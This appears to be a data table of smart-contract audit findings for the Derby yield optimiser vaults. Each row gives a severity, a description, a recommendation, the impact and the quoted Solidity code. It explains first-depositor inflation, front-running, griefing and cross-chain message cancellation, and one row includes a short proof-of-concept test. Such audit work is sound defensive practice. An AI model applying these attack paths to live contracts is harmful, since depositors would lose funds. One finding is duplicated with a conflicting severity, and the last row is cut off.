Columns: name · severity · description · recommendation · impact · function
The protocol cannot handle multiple vaults correctly
medium
The protocol needs to handle multiple vaults correctly. If there are three vaults (e.g. USDC, USDT, DAI), the protocol needs to rebalance all of them without any problems.

The protocol needs to invoke pushAllocationsToController() every `rebalanceInterval` to push totalDeltaAllocations from Game to xChainController.

`pushAllocationsToController()` invokes `rebalanceNeeded()` to check whether a rebalance is needed based on the configured interval, using the state variable `lastTimeStamp` for the calculation:
```
  function rebalanceNeeded() public view returns (bool) {
    return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;
  }
```

However, the first invocation of `pushAllocationsToController()` (for the USDC vault) updates the state variable `lastTimeStamp` to the current `block.timestamp`:
```
lastTimeStamp = block.timestamp;
```

A subsequent invocation (for the DAI vault) will then revert because of:
```
require(rebalanceNeeded(), "No rebalance needed");
```

So if the protocol has two or more vaults (USDC, USDT, DAI), only one rebalance can be performed every `rebalanceInterval`.
Track `lastTimeStamp` separately for every `_vaultNumber`, e.g. by using a per-vault array or mapping.
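A minimal sketch of the per-vault timestamp approach (the mapping name and function signatures are illustrative assumptions, not the protocol's actual code):

```solidity
// Hypothetical sketch: track the last rebalance timestamp per vault
// instead of a single global lastTimeStamp.
mapping(uint256 => uint256) public lastTimeStampPerVault;

function rebalanceNeeded(uint256 _vaultNumber) public view returns (bool) {
  return
    (block.timestamp - lastTimeStampPerVault[_vaultNumber]) > rebalanceInterval ||
    msg.sender == guardian;
}

function pushAllocationsToController(uint256 _vaultNumber) external payable {
  require(rebalanceNeeded(_vaultNumber), "No rebalance needed");
  // ... push this vault's deltas to the xChainController ...
  lastTimeStampPerVault[_vaultNumber] = block.timestamp; // only this vault's clock resets
}
```

With this change, rebalancing the USDC vault no longer blocks the DAI vault's rebalance within the same `rebalanceInterval`.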
The protocol cannot handle multiple vaults correctly.
Both users and Game players will lose funds because the MainVault will not rebalance the protocols at the right time with the right values.
```
  function rebalanceNeeded() public view returns (bool) {
    return (block.timestamp - lastTimeStamp) > rebalanceInterval || msg.sender == guardian;
  }
```
Users should not receive rewards for a rebalance period in which the protocol was blacklisted, because the protocol's price behaves unpredictably
medium
Users should not receive rewards for a rebalance period in which the protocol was blacklisted, because the protocol's price behaves unpredictably.

When a user allocates derby tokens to some underlying protocol, they receive rewards according to the exchange price of that protocol's token. This reward can be positive or negative. Rewards of a protocol are set on the `Game` contract inside the `settleRewards` function, and they are accumulated for the user once they call `rebalanceBasket`.
```
  function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {
    uint256 currentPrice = price(_protocolId);
    if (lastPrices[_protocolId] == 0) {
      lastPrices[_protocolId] = currentPrice;
      return;
    }

    int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);
    int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);
    int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;
    int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages

    if (totalAllocatedTokensRounded == 0) {
      rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;
    } else {
      rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;
    }

    lastPrices[_protocolId] = currentPrice;
  }
```

Every time, the previous price of the protocol is compared with the current price.
In case some protocol is hacked, there is a `Vault.blacklistProtocol` function that withdraws reserves from the protocol and marks it as blacklisted. The problem is that, because of the hack, it is not possible to determine what will happen with the exchange rate of the protocol: it can be 0, it can be very small, or it can be high for any reason. But the protocol still accrues rewards per token for that protocol, even though it is blacklisted. Because of that, a user who allocated to that protocol can end up accruing a very large negative or positive reward.
Both of these cases are bad, so I believe that if a protocol is blacklisted, it's better to set its rewards to 0.

Example:
1. A user allocated 100 derby tokens to protocol A.
2. Before the `Vault.rebalance` call, protocol A was hacked, which made its exchangeRate unrealistic.
3. The Derby team blacklisted protocol A.
4. Vault.rebalance is called, which used the new (incorrect) exchangeRate of protocol A to calculate `rewardPerLockedToken`.
5. When the user calls rebalanceBasket the next time, their rewards are accumulated with an extremely high/low value.
If a protocol is blacklisted, set `rewardPerLockedToken` to 0 for it inside the `storePriceAndRewards` function.
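A sketch of the suggested guard (the blacklist lookup mirrors the `controller.getProtocolBlacklist` call used elsewhere in the codebase; the exact wiring is an assumption):

```solidity
// Hypothetical sketch: skip reward accrual for blacklisted protocols.
function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {
  if (controller.getProtocolBlacklist(vaultNumber, _protocolId)) {
    // a hacked protocol's price is meaningless, so record no reward
    rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;
    return;
  }
  // ... existing price comparison and reward calculation ...
}
```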
Users' reward calculations are unpredictable.
```
  function storePriceAndRewards(uint256 _totalUnderlying, uint256 _protocolId) internal {
    uint256 currentPrice = price(_protocolId);
    if (lastPrices[_protocolId] == 0) {
      lastPrices[_protocolId] = currentPrice;
      return;
    }

    int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);
    int256 nominator = (int256(_totalUnderlying * performanceFee) * priceDiff);
    int256 totalAllocatedTokensRounded = totalAllocatedTokens / 1E18;
    int256 denominator = totalAllocatedTokensRounded * int256(lastPrices[_protocolId]) * 100; // * 100 cause perfFee is in percentages

    if (totalAllocatedTokensRounded == 0) {
      rewardPerLockedToken[rebalancingPeriod][_protocolId] = 0;
    } else {
      rewardPerLockedToken[rebalancingPeriod][_protocolId] = nominator / denominator;
    }

    lastPrices[_protocolId] = currentPrice;
  }
```
Malicious users could set allocations to a blacklisted protocol and break the rebalancing logic
medium
`game.sol` pushes `deltaAllocations` to the vaults via pushAllocationsToVaults(), and it deletes all the values of the `deltas`:
```
vaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;
```

Malicious users could set allocations to a blacklisted protocol. If even one of the `Baskets` has a non-zero value for a protocol on the blacklist, receiveProtocolAllocations() will revert (via `receiveProtocolAllocations() -> receiveProtocolAllocationsInt() -> setDeltaAllocationsInt()`):
```
  function setDeltaAllocationsInt(uint256 _protocolNum, int256 _allocation) internal {
    require(!controller.getProtocolBlacklist(vaultNumber, _protocolNum), "Protocol on blacklist");
    deltaAllocations[_protocolNum] += _allocation;
    deltaAllocatedTokens += _allocation;
  }
```

and you won't be able to execute rebalance().
Check whether the protocol is on the blacklist when Game players call `rebalanceBasket()`.
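One way this check could look on the Game side (a sketch only: the parameter layout and the blacklist accessor on the Game contract are illustrative assumptions):

```solidity
// Hypothetical sketch: reject basket allocations to blacklisted protocols
// at the moment the player rebalances their basket, so the revert happens
// in the player's transaction rather than during vault rebalancing.
function rebalanceBasket(uint256 _basketId, int256[][] memory _deltaAllocations) external {
  uint256 vaultNumber = baskets[_basketId].vaultNumber; // assumed bookkeeping
  for (uint256 chain = 0; chain < _deltaAllocations.length; chain++) {
    for (uint256 p = 0; p < _deltaAllocations[chain].length; p++) {
      if (_deltaAllocations[chain][p] != 0) {
        require(!controller.getProtocolBlacklist(vaultNumber, p), "Protocol on blacklist");
      }
    }
  }
  // ... existing delta-allocation bookkeeping ...
}
```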
The guardian isn't able to restart the protocol manually, and `game.sol` has lost the values of the `deltas`. The whole system is down.
```
vaults[_vaultNumber].deltaAllocationProtocol[_chainId][i] = 0;
```
Initial depositor can inflate the initial share price
medium
The initial deposit can be front-run by a non-whitelisted address to inflate the share price, evading the `training` block; every user after the first (the attacker) will then receive no shares in return for their deposit.

The `training` block inside the `deposit` function is intended to be set to true right after deployment. This `training` variable is there to make sure every early depositor address is on the whitelist, thus negating any malicious behaviour (especially from the first initial depositor).
```
File: MainVault.sol
  function deposit(
    uint256 _amount,
    address _receiver
  ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {
    if (training) {
      require(whitelist[msg.sender]);
      uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());
      require(_amount + balanceSender <= maxTrainingDeposit);
    }
```

The first-depositor issue is a well-known issue in vault share-based token minting: the initial deposit is susceptible to manipulation. It arises when the initial vault balance is 0 and the initial depositor (attacker) can manipulate the share accounting by donating a small amount, thus inflating the share price of his deposit. There are a lot of findings about this initial-depositor share issue.

Even though the `training` block is (probably) written to mitigate this, the transaction that sets `training` to true is separate from deployment, so it can be front-run by an attacker.
This again makes the initial deposit susceptible to attack.

The attack vector and impact are the same as TOB-YEARN-003, where users may not receive shares in exchange for their deposits if the total asset amount has been manipulated through a large "donation".

The initial exchangeRate is a fixed value set in the constructor, unrelated to totalSupply, but later calculations do use totalSupply:
```
File: MainVault.sol
  exchangeRate = _uScale;
// rest of code
  function setXChainAllocationInt(
    uint256 _amountToSend,
    uint256 _exchangeRate,
    bool _receivingFunds
  ) internal {
    amountToSendXChain = _amountToSend;
    exchangeRate = _exchangeRate;

    if (_amountToSend == 0 && !_receivingFunds) settleReservedFunds();
    else if (_amountToSend == 0 && _receivingFunds) state = State.WaitingForFunds;
    else state = State.SendingFundsXChain;
  }

File: XChainController.sol
  uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;
  uint256 totalSupply = getTotalSupply(_vaultNumber);

  uint256 decimals = xProvider.getDecimals(vault);
  uint256 newExchangeRate = (totalUnderlying * (10 ** decimals)) / totalSupply;
```
The simplest fix is to set `training` to `true` either at the variable definition or in the constructor, so the initial depositor is guaranteed to be on the whitelist.
Alternatively, a more common solution for this issue is to require a minimum size for the first deposit and burn a portion of the initial shares (or transfer it to a secure address).
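Both mitigations can be sketched as follows (the constant names and threshold values are hypothetical, chosen only for illustration):

```solidity
// Hypothetical sketch: enable training mode from deployment so it cannot be
// front-run, and neutralize donation attacks on the very first deposit.
bool public training = true; // set at declaration instead of via a later transaction

uint256 internal constant MINIMUM_FIRST_DEPOSIT = 1e6; // illustrative threshold
uint256 internal constant DEAD_SHARES = 1e3;           // illustrative dust amount

function deposit(uint256 _amount, address _receiver) external returns (uint256 shares) {
  if (totalSupply() == 0) {
    require(_amount >= MINIMUM_FIRST_DEPOSIT, "First deposit too small");
    // permanently lock a small share amount so inflating the share price
    // via a donation becomes unprofitable
    _mint(address(0xdead), DEAD_SHARES);
  }
  // ... existing whitelist/training checks and share minting ...
}
```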
The initial depositor can inflate the share price; other users (subsequent depositors) can lose their assets.
```
File: MainVault.sol
  function deposit(
    uint256 _amount,
    address _receiver
  ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {
    if (training) {
      require(whitelist[msg.sender]);
      uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());
      require(_amount + balanceSender <= maxTrainingDeposit);
    }
```
Wrong calculation of `balanceBefore` and `balanceAfter` in deposit method
medium
The deposit method calculates the net amount transferred from the user. It takes `reservedFunds` into consideration when calculating `balanceBefore` and `balanceAfter`, but that is not actually required:
```
    uint256 balanceBefore = getVaultBalance() - reservedFunds;
    vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);
    uint256 balanceAfter = getVaultBalance() - reservedFunds;
    uint256 amount = balanceAfter - balanceBefore;
```

The deposit may fail when `reservedFunds` is greater than `getVaultBalance()`.
Use the code below; this is the correct way of finding the net amount transferred by the depositor:
```
    uint256 balanceBefore = getVaultBalance();
    vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);
    uint256 balanceAfter = getVaultBalance();
    uint256 amount = balanceAfter - balanceBefore;
```
Deposit may fail when `reservedFunds` is greater than `getVaultBalance()`
```
    uint256 balanceBefore = getVaultBalance() - reservedFunds;
    vaultCurrency.safeTransferFrom(msg.sender, address(this), _amount);
    uint256 balanceAfter = getVaultBalance() - reservedFunds;
    uint256 amount = balanceAfter - balanceBefore;
```
Vault could `rebalance()` before funds arrive from xChainController
medium
sendFundsToVault() is invoked to push funds from the xChainController to the vaults; it calls xTransferToVaults().

For cross-chain rebalancing, `xTransferToVaults()` executes this logic:
```
    // rest of code
    pushFeedbackToVault(_chainId, _vault, _relayerFee);
    xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);
    // rest of code
```

`pushFeedbackToVault()` invokes receiveFunds(); `pushFeedbackToVault()` always travels through the slow path.
`xTransfer()` transfers funds from one chain to another; if fast liquidity is not available, `xTransfer()` will also go through the slow path.

The vulnerability: if the `xcall()` of `pushFeedbackToVault()` executes successfully before `xTransfer()` delivers the funds to the vault, anyone can invoke rebalance(), which leads to rebalancing vaults with incomplete funds (this is only true if the funds expected from the XChainController are greater than `reservedFunds` and `liquidityPerc` together).

The above scenario can occur in two cases:
1. `xTransfer()` goes through the slow path, but because of high slippage the cross-chain message waits until slippage conditions improve (relayers will continuously re-attempt the transfer execution).
2. The Connext team says:
```
All messages are added to a Merkle root which is sent across chains every 30 mins
And then those messages are executed by off-chain actors called routers

so it is indeed possible that messages are received out of order (and potentially with increased latency in between due to batch times)
For "fast path" (unauthenticated) messages, latency is not a concern, but ordering may still be (this is an artifact of the chain itself too btw)
one thing you can do is add a nonce to your messages so that you can yourself order them at destination
```

So `pushFeedbackToVault()` and `xTransfer()` could be added to different Merkle roots, which would lead to executing `receiveFunds()` before the funds arrive.
Check whether the funds have actually arrived before allowing the vault state to advance.
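One possible shape of that check, building on the vault's existing `getVaultBalance`, `reservedFunds`, and `settleReservedFunds` (the expected-amount parameter and function split are assumptions for illustration):

```solidity
// Hypothetical sketch: record the amount announced by the feedback message
// and only settle once the vault's balance actually covers it.
uint256 public expectedFundsFromXChain;

function receiveFunds(uint256 _expectedAmount) external onlyXProvider {
  expectedFundsFromXChain = _expectedAmount;
  tryToSettleFunds(); // settle immediately if the transfer already landed
}

function tryToSettleFunds() public {
  require(state == State.WaitingForFunds, "Wrong state");
  // if the xTransfer is still in flight, this reverts and anyone can retry later
  require(getVaultBalance() >= reservedFunds + expectedFundsFromXChain, "Funds not arrived");
  settleReservedFunds();
}
```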
The vault could `rebalance()` before funds arrive from the xChainController, which will reduce rewards.
```
    // rest of code
    pushFeedbackToVault(_chainId, _vault, _relayerFee);
    xTransfer(_asset, _amount, _vault, _chainId, _slippage, _relayerFee);
    // rest of code
```
`XChainController::sendFundsToVault` can be griefed and leave `XChainController` in a bad state
medium
A user can grief the send-funds-to-vault state transition by calling `sendFundsToVault` multiple times with the same vault.

During rebalancing, some vaults might need funds sent to them. They will be in state `WaitingForFunds`. To transition from here, any user can trigger `XChainController` to send them funds by calling `sendFundsToVault`.

This is triggered per chain and transfers funds from `XChainController` to the respective vaults on each chain.

At the end, when the vaults on each chain have been processed and have either received funds or didn't need any, `sendFundsToVaults` will trigger the state for this `vaultNumber` to be reset.

However, when transferring funds, there is never any check that this chain has not already been processed. So any user could simply call this function for a vault that either has no funds to transfer, or for which `XChainController` holds enough funds, and trigger the state reset for the vault.

PoC in `xChaincontroller.test.ts`; run after "4.5) Trigger vaults to transfer funds to xChainController":
```
  it('5) Grief xChainController send funds to vaults', async function () {
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });

    expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);

    expect(await vault3.state()).to.be.equal(3);

    // can't trigger state change anymore
    await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');
  });
```
I recommend the protocol either keeps track of which vaults have been sent funds in `XChainController`, or changes it so a vault can only receive funds when it is waiting for them:
```diff
diff --git a/derby-yield-optimiser/contracts/MainVault.sol b/derby-yield-optimiser/contracts/MainVault.sol
index 8739e24..d475ee6 100644
--- a/derby-yield-optimiser/contracts/MainVault.sol
+++ b/derby-yield-optimiser/contracts/MainVault.sol
@@ -328,7 +328,7 @@ contract MainVault is Vault, VaultToken {
   /// @notice Step 5 end; Push funds from xChainController to vaults
   /// @notice Receiving feedback from xController when funds are received, so the vault can rebalance
   function receiveFunds() external onlyXProvider {
-    if (state != State.WaitingForFunds) return;
+    require(state == State.WaitingForFunds, stateError);
     settleReservedFunds();
   }
```
XChainController ends up out of sync with the vault(s) that were supposed to receive funds.
The `guardian` can resolve this by resetting the states using admin functions, but those functions can still be front-run by a malicious user.
Until this is resolved, the rebalancing of the impacted vaults cannot continue.
```
  it('5) Grief xChainController send funds to vaults', async function () {
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });
    await xChainController.sendFundsToVault(vaultNumber, slippage, 10000, 0, { value: 0, });

    expect(await xChainController.getFundsReceivedState(vaultNumber)).to.be.equal(0);

    expect(await vault3.state()).to.be.equal(3);

    // can't trigger state change anymore
    await expect(xChainController.sendFundsToVault(vaultNumber, slippage, 1000, relayerFee, {value: parseEther('0.1'),})).to.be.revertedWith('Not all funds received');
  });
```
Protocol will not work on most of the supported blockchains due to a hardcoded WETH contract address
medium
The WETH address is hardcoded in the `Swap` library.

As stated in the README.md, the protocol will be deployed on the following EVM blockchains: Ethereum Mainnet, Arbitrum, Optimism, Polygon, and Binance Smart Chain. While the project has integration tests against an Ethereum mainnet RPC, they don't catch that on other chains (for example Polygon) several functionalities will not actually work, because of the hardcoded WETH address in the Swap.sol library:
```
address internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
```
The WETH variable should be immutable in the Vault contract instead of a constant in the Swap library, and the wrapped native token contract address should be passed to the Vault constructor on each separate deployment.
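A sketch of the deployment-time wiring (the constructor shape is illustrative; only the immutable-address pattern is the point):

```solidity
// Hypothetical sketch: pass the wrapped-native-token address at deployment
// instead of hardcoding mainnet WETH in the Swap library.
contract Vault {
  address public immutable weth;

  constructor(address _weth /*, ... other constructor params ... */) {
    // e.g. WMATIC on Polygon, WBNB on BSC, WETH on mainnet/Arbitrum/Optimism
    weth = _weth;
  }
}
```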
Protocol will not work on most of the supported blockchains.
```
address internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
```
Rebalancing can be indefinitely blocked due to ever-increasing `totalWithdrawalRequests`, causing locking of funds in vaults
medium
Rebalancing can get stuck indefinitely at the `pushVaultAmounts` step due to an error in the accounting of `totalWithdrawalRequests`. As a result, funds will be locked in vaults, since requested withdrawals are only executed after the next successful rebalance.

Funds deposited to underlying protocols can only be withdrawn from vaults after a next successful rebalance:
- a depositor has to make a withdrawal request first, which is tracked in the current rebalance period;
- requested funds can be withdrawn in the next rebalance period.

Thus, it's critical that rebalancing doesn't get stuck during one of its stages.

During rebalancing, vaults report their balances to `XChainController` via the pushTotalUnderlyingToController function: the function sends the current unlocked (i.e. excluding reserved funds) underlying token balance of the vault and the total amount of withdrawal requests in the current period. The latter amount is stored in the `totalWithdrawalRequests` storage variable:
- the variable is increased when a new withdrawal request is made;
- it is set to 0 after the vault has been rebalanced, when its value is added to the reserved funds.

The logic of `totalWithdrawalRequests` is that it tracks only the requested withdrawal amounts of the current period; this amount becomes reserved during rebalancing and is added to `reservedFunds` after the vault has been rebalanced.

When `XChainController` receives underlying balances and withdrawal requests from vaults, it tracks them internally. The amounts are then used to calculate how many tokens a vault needs to send or receive after a rebalancing: the total withdrawal amount is subtracted from the vault's underlying balance so that it is excluded from the amounts that will be sent to the protocols, and so that it can then be added to the vault's reserved funds.

However, `totalWithdrawalRequests` in `XChainController` is not reset between rebalancings: when a new rebalancing starts, `XChainController` receives allocations from the Game and calls `resetVaultUnderlying`, which resets the underlying balances received from vaults in the previous rebalancing. `resetVaultUnderlying` doesn't set `totalWithdrawalRequests` to 0:
```
function resetVaultUnderlying(uint256 _vaultNumber) internal {
  vaults[_vaultNumber].totalUnderlying = 0;
  vaultStage[_vaultNumber].underlyingReceived = 0;
  vaults[_vaultNumber].totalSupply = 0;
}
```

This causes the value of `totalWithdrawalRequests` to accumulate over time. At some point, the total historical amount of all withdrawal requests (which `totalWithdrawalRequests` actually tracks) will be greater than the underlying balance of a vault, and this line will revert due to an underflow in the subtraction:
```
uint256 totalUnderlying = getTotalUnderlyingVault(_vaultNumber) - totalWithdrawalRequests;
```
In `XChainController.resetVaultUnderlying`, consider setting `vaults[_vaultNumber].totalWithdrawalRequests` to 0. Like its `MainVault.totalWithdrawalRequests` counterpart, it tracks withdrawal requests only in the current period and should be reset to 0 between rebalancings.
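The fix is a one-line addition to the reset function shown in the description (sketch only):

```solidity
// Hypothetical sketch: also reset the accumulated withdrawal requests
// when a new rebalancing starts.
function resetVaultUnderlying(uint256 _vaultNumber) internal {
  vaults[_vaultNumber].totalUnderlying = 0;
  vaultStage[_vaultNumber].underlyingReceived = 0;
  vaults[_vaultNumber].totalSupply = 0;
  vaults[_vaultNumber].totalWithdrawalRequests = 0; // prevents the underflow in pushVaultAmounts
}
```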
Due to accumulation of withdrawal request amounts in the `totalWithdrawalRequests` variable, `XChainController.pushVaultAmounts` can be blocked indefinitely once the value of `totalWithdrawalRequests` has grown bigger than the `totalUnderlying` value of a vault. Since withdrawals from vaults are delayed and enabled only in a following rebalancing period, depositors may not be able to withdraw their funds from vaults due to the blocked rebalancing.
While `XChainController` implements a bunch of guardian-restricted functions that allow the guardian to push a rebalancing through, none of these functions resets the value of `totalWithdrawalRequests`. If `totalWithdrawalRequests` becomes bigger than `totalUnderlying`, the guardian won't be able to fix the state of `XChainController` and push the rebalancing through.
```
function resetVaultUnderlying(uint256 _vaultNumber) internal {
  vaults[_vaultNumber].totalUnderlying = 0;
  vaultStage[_vaultNumber].underlyingReceived = 0;
  vaults[_vaultNumber].totalSupply = 0;
}
```
Wrong type casting leads to unsigned integer underflow exception when current price is < last price
medium
When the current price of a locked token is lower than the last price, Vault.storePriceAndRewards will revert because of wrong integer casting.

The following line appears in Vault.storePriceAndRewards:
```
int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);
```

If lastPrices[_protocolId] is higher than currentPrice, the transaction will revert due to the underflow when subtracting unsigned integers, because Solidity first computes `currentPrice - lastPrices[_protocolId]` and only then casts the result to int256.
Casting should be performed in the following way to avoid the underflow and to allow priceDiff to be negative:
```
int256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]);
```
The rebalance will fail when the current token price is less than the last one stored.
```
int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);
```
Withdrawal request can be overridden
medium
It is possible that a withdrawal request is overridden during the initial phase.

Users have two options to withdraw: directly, or by requesting a withdrawal if not enough funds are available at the moment.

When making a `withdrawalRequest`, it is required that the user has `withdrawalRequestPeriod` unset:
```
  function withdrawalRequest(
    uint256 _amount
  ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {
    UserInfo storage user = userInfo[msg.sender];
    require(user.withdrawalRequestPeriod == 0, "Already a request");

    value = (_amount * exchangeRate) / (10 ** decimals());

    _burn(msg.sender, _amount);

    user.withdrawalAllowance = value;
    user.withdrawalRequestPeriod = rebalancingPeriod;
    totalWithdrawalRequests += value;
  }
```

This misbehaves during the initial period when `rebalancingPeriod` is 0: the check passes, so if the function is invoked multiple times, it burns the user's shares and overwrites the previous value.
Require `rebalancingPeriod != 0` in `withdrawalRequest`; otherwise, force users to withdraw directly.
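A sketch of the guard (only the added require is new; the rest mirrors the function quoted above):

```solidity
// Hypothetical sketch: disallow withdrawal requests before the first rebalance,
// since period 0 is indistinguishable from "no request" in UserInfo.
function withdrawalRequest(
  uint256 _amount
) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {
  require(rebalancingPeriod != 0, "No rebalance yet; withdraw directly");
  UserInfo storage user = userInfo[msg.sender];
  require(user.withdrawalRequestPeriod == 0, "Already a request");
  // ... existing burn and bookkeeping ...
}
```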
While not very likely to happen, the impact would be huge: users who invoke this function several times before the first rebalance would burn their shares and lose their previous `withdrawalAllowance`. The protocol should prevent such mistakes.
```
  function withdrawalRequest(
    uint256 _amount
  ) external nonReentrant onlyWhenVaultIsOn returns (uint256 value) {
    UserInfo storage user = userInfo[msg.sender];
    require(user.withdrawalRequestPeriod == 0, "Already a request");

    value = (_amount * exchangeRate) / (10 ** decimals());

    _burn(msg.sender, _amount);

    user.withdrawalAllowance = value;
    user.withdrawalRequestPeriod = rebalancingPeriod;
    totalWithdrawalRequests += value;
  }
```
Anyone can execute certain functions that use cross-chain messages and potentially cancel them, with potential loss of funds.
high
Certain functions that route messages cross-chain on the `Game` and `MainVault` contracts are unprotected (anyone can call them in the required state of the vaults). The way the cross-chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets `msg.sender` as the `delegate` and `msg.value` as the `relayerFee`. There are two possible attack vectors:

Either an attacker can call the function with msg.value set too low, so the message won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This means special action must be taken to bump the fee in such a case.

Or the attacker can call the function (which irreversibly changes the state of the contract) and, as the delegate of the `xcall`, cancel the message. This functionality is not yet active on Connext, but the moment it is, the attacker will be able to change the state of the contract on the origin chain while making the cross-chain message not execute on the destination chain, leaving the contracts on the two chains out of sync, with possible loss of funds as a result.

The `XProvider` contract's `xsend()` function sets `msg.sender` as the delegate and `msg.value` as the `relayerFee`:
```
    uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;
    IConnext(connext).xcall{value: relayerFee}(
      _destinationDomain, // _destination: Domain ID of the destination chain
      target, // _to: address of the target contract
      address(0), // _asset: use address zero for 0-value transfers
      msg.sender, // _delegate: address that can revert or forceLocal on destination
      0, // _amount: 0 because no funds are being transferred
      0, // _slippage: can be anything between 0-10000 because no funds are being transferred
      _callData // _callData: the encoded calldata to send
    );
  }
```

`xTransfer()` also uses `msg.sender` as the delegate:
```
    IConnext(connext).xcall{value: (msg.value - _relayerFee)}(
      _destinationDomain, // _destination: Domain ID of the destination chain
      _recipient, // _to: address receiving the funds on the destination
      _token, // _asset: address of the token contract
      msg.sender, // _delegate: address that can revert or forceLocal on destination
      _amount, // _amount: amount of tokens to transfer
      _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 30 = 0.3%)
      bytes("") // _callData: empty bytes because we're only sending funds
    );
  }
```

The Connext documentation explains:
```
params.delegate | (optional) Address allowed to cancel an xcall on destination.
```

The Connext documentation seems to indicate this functionality isn't active yet, though it isn't clear whether that applies to the cancel itself or only to bridging the funds back to the origin chain.
Add access control to the functions sending messages across Connext so only the Guardian can call them with the correct msg.value, and do not use msg.sender as the delegate but rather a configurable address such as the Guardian.
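A sketch of both changes on the `xsend()` path (the modifier and guardian storage are illustrative; `IConnext`, `connext`, and `target` are taken from the quoted code):

```solidity
// Hypothetical sketch: restrict the caller and use a configurable delegate
// instead of msg.sender.
address public guardian;

modifier onlyGuardian() {
  require(msg.sender == guardian, "Only guardian");
  _;
}

function xsend(uint32 _destinationDomain, bytes memory _callData) external payable onlyGuardian {
  IConnext(connext).xcall{value: msg.value}(
    _destinationDomain, // _destination: Domain ID of the destination chain
    target,             // _to: address of the target contract
    address(0),         // _asset: address zero for 0-value transfers
    guardian,           // _delegate: trusted address, not an arbitrary caller
    0,                  // _amount
    0,                  // _slippage
    _callData           // _callData
  );
}
```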
An attacker can call certain functions that leave the relying contracts on different chains in an unsynced state, with possible loss of funds as a result (mainly in XChainController's `sendFundsToVault()`, where actual funds are transferred).
```
    uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;
    IConnext(connext).xcall{value: relayerFee}(
      _destinationDomain, // _destination: Domain ID of the destination chain
      target, // _to: address of the target contract
      address(0), // _asset: use address zero for 0-value transfers
      msg.sender, // _delegate: address that can revert or forceLocal on destination
      0, // _amount: 0 because no funds are being transferred
      0, // _slippage: can be anything between 0-10000 because no funds are being transferred
      _callData // _callData: the encoded calldata to send
    );
  }
```
Wrong type casting leads to unsigned integer underflow exception when current price is < last price
high
When the current price of a locked token is lower than the last price, Vault.storePriceAndRewards will revert because of wrong integer casting.

The following line appears in Vault.storePriceAndRewards:
```
int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);
```

If lastPrices[_protocolId] is higher than currentPrice, the transaction will revert due to the underflow when subtracting unsigned integers, because Solidity first computes `currentPrice - lastPrices[_protocolId]` and only then casts the result to int256.
Casting should be performed in the following way to avoid the underflow and to allow priceDiff to be negative:
```
int256 priceDiff = int256(currentPrice) - int256(lastPrices[_protocolId]);
```
The rebalance will fail when the current token price is less than the last one stored.
```
int256 priceDiff = int256(currentPrice - lastPrices[_protocolId]);
```
Not all providers claim the rewards
high
Providers wrongly assume that the protocols will no longer incentivize users with extra rewards.\\nAmong the current providers, only the `CompoundProvider` claims the `COMP` incentives; the others leave the claim function empty:\\n```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n
Adjust the providers to be ready to claim the rewards if necessary.
The implementations of the providers are based on the current situation. They are not flexible enough to support the rewards in case the incentives are back.
```\\n function claim(address _aToken, address _claimer) public override returns (bool) {}\\n```\\n
Withdrawal request override
medium
